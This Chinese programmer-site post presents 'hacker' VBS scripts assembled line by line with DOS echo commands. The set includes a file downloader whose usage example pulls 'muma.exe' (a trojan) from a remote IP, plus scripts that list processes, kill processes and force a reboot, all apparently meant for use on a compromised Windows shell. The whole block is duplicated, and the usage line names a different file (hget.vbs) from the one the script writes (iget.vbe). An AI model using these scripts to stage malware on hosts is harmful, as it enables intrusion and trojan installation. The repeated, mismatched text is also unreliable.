一些经典的主要用户黑客的vbs脚本结合echo的dos下实现
程序员文章站
2022-04-09 11:45:07
1.文件下载(无回显) echo ilocal = lcase(wscript.arguments(1)) >ig...
1.文件下载(无回显)
echo ilocal = lcase(wscript.arguments(1)) >iget.vbe
echo iremote = lcase(wscript.arguments(0)) >>iget.vbe
echo set xpost = createobject("microsoft.xmlhttp") >>iget.vbe
echo xpost.open "get",iremote,0 >>iget.vbe
echo xpost.send() >>iget.vbe
echo set sget = createobject("adodb.stream") >>iget.vbe
echo sget.mode = 3 >>iget.vbe
echo sget.type = 1 >>iget.vbe
echo sget.open() >>iget.vbe
echo sget.write(xpost.responsebody) >>iget.vbe
echo sget.savetofile ilocal,2 >>iget.vbe
用法: cscript hget.vbs http://111.111.111.111/muma.exe muma.exe
2.列举进程
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
用法:cscript ps.vbs
3.终止进程
@echo for each ps in getobject _ >pskill.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pskill.vbs
用法:cscript pskill.vbs pid
4.重启系统
@echo for each os in getobject _ >reboot.vbs
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs
@echo os.win32shutdown(2):next >>reboot.vbs
用法:cscript reboot.vbs
echo ilocal = lcase(wscript.arguments(1)) >iget.vbe
echo iremote = lcase(wscript.arguments(0)) >>iget.vbe
echo set xpost = createobject("microsoft.xmlhttp") >>iget.vbe
echo xpost.open "get",iremote,0 >>iget.vbe
echo xpost.send() >>iget.vbe
echo set sget = createobject("adodb.stream") >>iget.vbe
echo sget.mode = 3 >>iget.vbe
echo sget.type = 1 >>iget.vbe
echo sget.open() >>iget.vbe
echo sget.write(xpost.responsebody) >>iget.vbe
echo sget.savetofile ilocal,2 >>iget.vbe
用法: cscript hget.vbs http://111.111.111.111/muma.exe muma.exe
2.列举进程
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
用法:cscript ps.vbs
3.终止进程
@echo for each ps in getobject _ >pskill.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pskill.vbs
用法:cscript pskill.vbs pid
4.重启系统
@echo for each os in getobject _ >reboot.vbs
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs
@echo os.win32shutdown(2):next >>reboot.vbs
用法:cscript reboot.vbs